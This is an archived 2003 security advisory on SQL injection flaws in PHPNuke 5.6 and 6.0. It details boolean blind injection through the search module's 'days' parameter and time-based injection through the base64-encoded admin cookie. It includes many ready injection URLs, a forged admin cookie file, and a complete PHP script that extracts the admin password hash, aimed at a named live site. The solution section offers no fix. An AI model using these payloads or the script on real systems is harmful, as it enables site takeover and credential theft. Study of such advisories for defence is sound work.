Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: sb6008.htm

PHPNuke SQL Injection



21th Feb 2003 [SBWID-6008]
COMMAND

	PHPNuke SQL Injection

SYSTEMS AFFECTED

	PHPnuke 6.0 & 5.6

PROBLEM

	Vulnerability discovered by David Zentner [david@cgishield.com] :
	
	 http://CGIshield.com
	
	
	 How to steal the password hash of the Admin use
	 ===============================================
	
	PHPnuke, a widely used open-source web portal system, has been found  to
	contain a remotely exploitable SQL injection bug, which allows  stealing
	of the administrator's password hash. With the  hash,  an  attacker  may
	login and gain complete  control  of  the  administrative  side  of  the
	system.
	
	
	The  bug  exists  in   the   search   engine   included   with   PHPnuke
	(/modules/search/index.php). In this  file,  a  database  call  is  made
	without placing quotes  around  a  user  supplied  variable.  Since  the
	database call selects information from the user table, a hacker can  use
	a 'select  fish'  attack.  In  this  type  of  attack,  the  hacker  can
	determine the value of a single character in any  given  column  in  the
	table specified in the statement. The column of  most  importance  to  a
	hacker would be the one holding the administrators  encrypted  password.
	Since the passwords in PHPnuke (and many  other  programs)  are  an  md5
	hash, there are only 16 possible values for each character and 32  total
	characters to expect. Select fishing involves utilizing the MySQL  mid()
	function to return true if the character is guessed  correctly,  thereby
	returning a set of results to the screen. If the results show up on  the
	screen, the  attacker  can  determine  that  the  character  is  guessed
	correctly,  and  then  proceed  to  guess  the  next  character  in  the
	sequence. Any md5 password hash can be fished in less than  512  (32*16)
	guesses. When done by hand, this can take anywhere from  20-30  minutes,
	but when the process is automated with a program it can take only a  few
	minutes. One such program is included at the end of this document.
	
	The first url the hacker would try could look like this:
	
	http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=6&type=stories
	
	When phpnuke queries the mysql  database,  the  query  then  looks  like
	this:
	
	"select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, 
	s.bodytext, a.url, s.comments, s.topic from nuke_stories s, nuke_authors a 
	where s.aid=a.aid AND (s.title LIKE '%%' OR s.hometext LIKE '%%' OR 
	s.bodytext LIKE '%%' OR s.notes LIKE '%%') AND TO_DAYS(NOW()) - TO_DAYS
	(time) <= 1 or mid(a.pwd,1,1)=6 ORDER BY s.time DESC LIMIT 0,10"
	
	It would check the admin table to see if the first character in the  pwd
	(password) column is equal to a value of  '6'.  If  any  admin  password
	begins with a value of '6', stories written by that  admin  will  appear
	on the screen. If no admin password begins with a value of '6',  or  the
	admin has written no  stories,  then  the  screen  will  list  no  story
	results.
	
	example admin's hash: 6a204bd89f3c8348afd5c77c717a097a
	
	will the admin's stories show with the following urls called?
	
	(*note* in version 6.0 a check for '()' in any GET  variable  was  added
	on line 36 of mainfile.php , therefore the following data  strings  will
	only work via POST in version 6.0 or later. The exploit included at  the
	end of this file works via POST.)
	
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=1&type=stories		NO
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=2&type=stories		No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=3&type=stories		No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=4&type=stories		No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=5&type=stories		No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=6&type=stories		Yes
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=7&type=stories		No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=8&type=stories		No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=9&type=stories		No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=0&type=stories		No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=char(97)&type=stories	No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=char(98)&type=stories	No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=char(99)&type=stories	No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=char(100)&type=stories	No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=char(101)&type=stories	No
	modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
	(a.pwd,1,1)=char(102)&type=stories	No
	</fotn>
	To guess the next character in the sequence the attacker could use the 
	following url:
	
	http://site/modules.php?
	name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,2,1)=1&type=stories
	
	and so forth, until all values  are  determined.  When  guessing  values
	from a- f, these values normally would need to be surrounded  by  single
	quotes. This presents a problem for PHP  and  other  applications  which
	normally escape quotes. To get around this problem, one  could  use  the
	mysql char() function which will output any ascii value,  without  using
	quotes. So to guess the letter 'a' the hacker could use  char(97).  Here
	is an example url guessing the 3rd character in the pwd column as 'a':
	
	http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories
	
	Now that the attacker determines the password hash of  the  admin  user,
	he can base64 encode the hash (which is what phpnuke expects) and  place
	it in a netscape cookie file, and gain access to  the  target  site.  If
	the admin's password is 'admin' and  the  admin's  username  is  'admin'
	then you would take the value 'admin:admin:' and base64 encode  it,  put
	it in the cookie (the variable of the encoded values is itself  'admin')
	the end result would look similar to this (on localhost):
	
	lang
	english
	localhost/html/
	1024
	1809931264
	29595766
	4083407360
	29522340
	*
	admin
	YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6
	localhost/html/
	1024
	3858912640
	29529535
	3993654000
	29523500
	*
	
	
	 How to steal the password hash of the Admin user method #2
	 ==========================================================
	
	PHPnuke, a widely used open-source web portal system, has been found  to
	contain a remotely exploitable SQL injection bug, which allows  stealing
	of the administrator's password hash. With the  hash,  an  attacker  may
	login and gain complete  control  of  the  administrative  side  of  the
	system.
	
	The bug exists due to  the  format  of  the  admin  user's  cookies.  In
	PHPnuke   the   admin   credentials   are   stored    in    the    form:
	'username:password:', with the password md5 encrypted,  and  the  entire
	string base64 encoded.
	
	Everytime a webpage is  requested  on  the  site  running  PHPnuke,  the
	'admin' cookie variable (which contains the username/password value)  is
	sent to the script,  and  everytime  its  validity  is  checked  in  the
	auth.php file. Here is the key code in auth.php which does the check:
	
	// start code
	
	if(isset($admin) && $admin != "") {
	  $admin = base64_decode($admin);
	  $admin = explode(":", $admin);
	  $aid = "$admin[0]";
	  $pwd = "$admin[1]";
	  $admlanguage = "$admin[2]";
	  if ($aid=="" || $pwd=="") {
	    $admintest=0;
	    echo "<html>\n";
	    echo "<title>INTRUDER ALERT!!!</title>\n";
	    echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n";
	    echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n";
	    echo "<b>Get Out!
	</b></center>\n";
	    echo "</body>\n";
	    echo "</html>\n";
	    exit;
	  }
	  $result=sql_query("select pwd from ".$prefix."_authors where 
	aid='$aid'", $dbi);
	  if(!$result) {
	        echo "Selection from database failed!";
	        exit;
	  } else {
	    list($pass)=sql_fetch_row($result, $dbi);
	    if($pass == $pwd && $pass != "") {
	        $admintest = 1;
	    }
	  }
	}
	
	// end code
	
	
	As you notice, the $admin variable is first base64_decoded(), and  split
	into the two variables $aid and $pwd. The security problem lies  in  the
	fact that when a string containing one or more single  quote  is  base64
	encoded, and submitted to the  site,  it  will  bypass  PHP's  automatic
	escaping of GPC variables.  Since  no  additional  checks  are  done  to
	defend against an sql injection, an  attacker  is  free  to  modify  the
	select query and determine the admin password hash.
	
	
	A more advanced version of the select fish attack must take place.  This
	is because in order to determine a certain character value,  the  script
	has to respond in different way if the character guess is correct.  This
	is not naturally possible in PHPnuke, but it can be  accomplished  using
	mySQL's benchmark() to give a delayed page response when  the  character
	is guessed correctly.
	
	Now that you are aware of where the sql injection attack occurs, let  me
	show the process of how this attack would work by modifying  the  select
	query:
	
	(`select pwd from ".$prefix."_authors where aid='$aid'`)
	
	
	lets   say   the   'admin'    user    has    a    password    hash    of
	'21232f297a57a5a743894a0e4a801fc3'. When we modify the  query  to  check
	if the first digit of the 'admin' password hash is equal to '1', we  get
	the following result:
	
	mysql> select pwd from nuke_authors where aid='admin' 
	and if(mid(pwd,1,1)=1,benchmark(10000000,encode("AAAA","AAAA")),1)/*;
	+----------------------------------+
	| pwd                              |
	+----------------------------------+
	| 21232f297a57a5a743894a0e4a801fc3 |
	+----------------------------------+
	1 row in set (0.00 sec)
	
	
	The small query execution time signifies an incorrect guess.  Look  what
	happens when the attacker correctly guesses that the first character  of
	the 'admin' password hash is '2':
	
	mysql> select pwd from nuke_authors where aid='admin' and if(mid(pwd,1,1)
	=2,benchmark(20000000, encode("AAAA","AAAA")),1)/*;
	Empty set (11.11 sec)
	
	The attacker can prolong the execution time to his or her liking when  a
	correct guess occurs by raising the first argument  to  the  benchmark()
	function. By the different  server  response  time  ,  an  attacker  can
	determine a the admin's password hash one character at a time.
	
	<?php
	
	########## PHPnuke Auto-SelectFish Attacker
	########## David@cgishield.com
	########## works on phpnuke 5.6 and 6.0
	
	// To use this program, simply upload it to a php enabled webserver, and 
	execute
	// If php times out before the whole password hash is determined, 
	// adjust the maximum script execution time in php.ini
	// Also, replace following with correct values:
	
	$server="www.phpnuke.org";
	$script="/modules.php";
	
	// Title of a story created specifically by the admin who is being hacked.
	$data_to_match="Revolution";
	$admin_account_name="nukelite";
	$beginchar="1";
	$endchar="33";
	
	
	
	$admin_account_name=urlencode($admin_account_name);
	$data_to_match=urlencode($data_to_match);
	
	$checkchar[0]="char(48)";
	$checkchar[1]="char(49)";
	$checkchar[2]="char(50)";
	$checkchar[3]="char(51)";
	$checkchar[4]="char(52)";
	$checkchar[5]="char(53)";
	$checkchar[6]="char(54)";
	$checkchar[7]="char(55)";
	$checkchar[8]="char(56)";
	$checkchar[9]="char(57)";
	$checkchar[a]="char(97)";
	$checkchar[b]="char(98)";
	$checkchar[c]="char(99)";
	$checkchar[d]="char(100)";
	$checkchar[e]="char(101)";
	$checkchar[f]="char(102)";
	
	for($i=$beginchar;$i<$endchar;$i++){
	reset($checkchar);
	while (list($i2, $i2val) = @each($checkchar)){
	
	$vars="name=Search&query=$data_to_match&topic=&category=&author=$admin_acco
	unt_name&days=1000+and+mid(a.pwd,$i,1)=$checkchar[$i2]&type=stories";
		$data=sendToHost("$server",'post',"$script","$vars");
	
		if (eregi("No matches found to your query","$data")){
	
		}
	else{
	
	echo("<br>$i= $i2"); flush();break;}
	
		}
	
	}
	
	
	function sendToHost($host,$method,$path,$data,$useragent=1)
	{
		$method = strtoupper($method);
		$fp = fsockopen($host,80);
		fputs($fp, "$method $path HTTP/1.1\n");
		fputs($fp, "Host: $host\n");
		fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
		fputs($fp, "Content-length: " . strlen($data) . "\n");
		if ($useragent)
			fputs($fp, "User-Agent: Mozilla\n");
		fputs($fp, "Connection: close\n\n");
		if ($method == 'POST')
			fputs($fp, $data);
		while (!feof($fp))
			$buf .= fgets($fp,128);
		fclose($fp);
	for($slow=0;$slow<100;$slow++){}
	
		return $buf;
	}
	
	
	?>
	
	

SOLUTION

	?


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH